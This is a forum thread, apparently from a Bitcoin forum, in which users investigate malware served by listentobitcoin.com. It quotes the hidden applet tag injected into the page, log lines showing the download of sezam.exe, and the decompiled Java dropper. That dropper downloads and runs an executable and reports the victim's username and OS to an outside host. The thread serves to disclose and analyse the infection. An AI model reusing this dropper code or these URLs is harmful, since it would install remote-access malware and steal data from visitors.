Got this risk message, can someone elaborate on the listentobitcoin malware?

[coastermonger]

FIRST PRIORITY, DO NOT GO TO LISTEN TO BITCOIN . COM

Saw this message come up from one of my AV recently. 

along with a reddit post from the creator, apologizing for what happened to the site:
http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Can anyone elaborate on what kind of malware exists or existed at this site?  I was browsing with chrome and unfortunately hadn't seen the post yet.  I visited listentobitcoin, but chrome didn't bring up any warning and I wasn't asked to install anything. 

I'm curious what steps I need to talk to make sure that my computer is clear

[alp]

Make sure it's clear?  Reformat.

[SlickTheNick]

Hint: for the most part, Anti Virus software is mostly snake oil. especially Mcafee, Norton etc.

[DiamondCardz]

listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.

[Nagle]

listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.

None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"

[Remember remember the 5th of November]

listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.

None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"

Look at the date of the thread, please!

[DiamondCardz]

listentobitcoin was sold ages ago and malware was installed. Old news.

The official site is now http://www.bitlisten.com/

It's some kind of malware, it is dangerous. You could lose bitcoin, I'd clear your computer. Scan with MalwareBytes.

None of the major analysis tools find malware on "listentobitcoin.com".

Comodo: http://app.webinspector.com/public/reports/18708129
Google: http://www.google.com/safebrowsing/diagnostic?site=listentobitcoin.com

This sounds like a scam to get people to switch to "bitlisten.com"

First, nice gravedig.
Second, you're a retard.
Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.

Finally, http://www.reddit.com/r/Bitcoin/comments/1ia7q2/listen_to_bitcoin_contains_malware/cb2kpqb

Please get your facts together before you try to spread FUD about something you know nothing about. Thanks.

[Nagle]

Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.

I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware.  But I think there's a bug in Firefox's playing of audio files which results in choppy audio.  Both sites will produce choppy audio after they've been running for a while. Once this has happened, Firefox has to be restarted to fix the problem. This appears under both Windows 7 and Linux.

[DiamondCardz]

Third, you probably haven't even went on the fucking site yourself and I sure as hell won't. Maybe it's changed in 2 MONTHS, maybe not, I don't care to find out.

I've been looking at the code on both sites, and running the sites through various testers, and I'm not seeing any malware.

Interesting. I don't know how the domain might have been re-acquired, but it was throwing up malware.

[devthedev]

I said this below, but I want it to be a part of this post as well: I realize now that I made a very foolish mistake by selling the domain to someone untrustworthy, and I want to personally apologize to everyone who has been affected. I was too trusting, I made a huge mistake, and for what my words are worth, I promise that it won’t happen again.

~Maximillian Laumeister

http://bitcoinexaminer.org/listentobitcoin-com-was-infected-by-an-anonymous-buyer-says-founder-of-the-website/

[nfuse]

well for me it was to late i lost 0.47 btc and 15 ltc today because of this shit about 23 december i visited listentobitcoin.com and today i found out my cryptsy.com account was emptyed.

after searching i found in the java logs the answer that say's it all

    ]  ª   
C! H 
Ch9àÖ           
B             
C  Ø×                             
C  Ø×                                   %http://listentobitcoin.info/sezam.exe   188.165.49.114    <null> HTTP/1.1 200 OK content-length 502272
last-modified Fri, 20 Dec 2013 17:50:53 GMT expires Mon, 06 Jan 2014 15:44:16 GMT content-type application/octet-stream date Mon, 23 Dec 2013 15:44:16 GMT server nginx
cache-control max-age=1209600

sezam.exe create's a directory called /directory/cybergate/googleupdate.exe what allowed the hacker (lowlife scum) to access my laptop when i was away

i hopefully learned my lesson and using 2FA for now now i just need something to put back on my account

if you thief have a change of heart and want to sleep better @ night please return my btc to 192ou1R5P3MQNtFoYDh1SuEDjcbGMJYZtk

[Nagle]

The malware seems to be back. At the end of "www.listentobitcoin.com" is this code:

Code:

<applet name="JavaUpdate" code="Client.class" archive="http://secure-jar.com/PLFG/Java.jar" width="0" height="0">
<param name="us" value="javasan.exe">
<param name="ca" value="http://ge.tt/api/1/files/4mRU7fB1/0/blob?download">
<param name="uk" value="http://www.listentobitcoin.com">
<param name="nl" value="fox33">
</applet>

This is appended to the end of the page, outside the </html> tag. This looks like something a break-in attack appended automatically and blindly.

[daviducsb]

Are Apple computers susceptible to the malware on listentobitcoins or only PCs? If one visited the site on an Apple is one at risk?

[daviducsb]

Hello... Anybody... Is it a threat to Apple Macs?

thx

[someguy123]

I decompiled their java file and it seems to be some kind-of download script. Here's malwarebytes post about it : http://blog.malwarebytes.org/fraud-scam/2014/01/musical-bitcoin-bubbles-serve-java-applets-malware/

Here's the source code decompiled for any security people

Code:

import java.applet.Applet;
import java.applet.AppletContext;
import java.io.FileOutputStream;
import java.io.InputStream;
import java.net.URL;
import java.net.URLConnection;

public class SecureJAR extends Applet
{
  public void init()
  {
    String str1 = System.getProperty("user.name");
    String str2 = System.getProperty("os.name");
    String str3 = System.getenv("temp");
    String str4 = "\\";
    String str5 = getParameter("rgsicvnjbn");
    String str6 = str4.concat(str5);
    String str7 = str3.concat(str6);
    Object localObject = getParameter("ioqujbjsyq");
    String str8 = "&yuvcpearce=";
    String str9 = getParameter("ivmbhojyjv");
    try
    {
      str2 = str2.replace(" ", "%20");
      str1 = str1.replace(" ", "%20");
      FileOutputStream localFileOutputStream = new FileOutputStream(str7);
      Runtime localRuntime = Runtime.getRuntime();
      URL localURL1 = new URL(getParameter("xmxdnhwphy"));
      URLConnection localURLConnection = localURL1.openConnection();
      InputStream localInputStream = localURLConnection.getInputStream();
      byte[] arrayOfByte = new byte[1024];
      int i;
      while ((i = localInputStream.read(arrayOfByte, 0, arrayOfByte.length)) != -1)
        localFileOutputStream.write(arrayOfByte, 0, i);
      localInputStream.close();
      localFileOutputStream.close();
      localRuntime.exec(str7);
      localObject = new URL((String)localObject);
      getAppletContext().showDocument((URL)localObject);
      URL localURL2 = new URL("http://epickit.net/qsxnonlvrc.php?username=" + str9 + str8.replace("yuvcpearce", "evyaipgncs") + str2 + str8.replace("yuvcpearce", "piyhnvzbpw") + str1 + str8.replace("yuvcpearce", "tlbkqdpvxm") + "Traditional");
      localURL2.openStream();
    }
    catch (Exception localException)
    {
    }
  }
}

[someguy123]

Hello... Anybody... Is it a threat to Apple Macs?

thx

The virus appears to download an EXE payload. Whether or not it has alternative payloads for Mac or Linux is unknown, but if you've visited the site and allowed the JAR to run, you may want to run some form of mac security program, as it's now detected by a good amount of antivirus programs.